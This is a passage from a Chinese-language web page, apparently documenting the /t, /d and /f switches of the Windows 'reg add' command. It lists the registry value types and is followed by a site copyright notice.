/t Type:指定注册表项的类型。Type 必须是以下几种类型之一:
- REG_SZ
- REG_MULTI_SZ
- REG_DWORD_BIG_ENDIAN
- REG_DWORD
- REG_BINARY
- REG_DWORD_LITTLE_ENDIAN
- REG_LINK
- REG_FULL_RESOURCE_DESCRIPTOR
- REG_EXPAND_SZ
/d Data:指定新注册表项的数据。
/f:添加注册表项而不要求确认。
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
评论(0)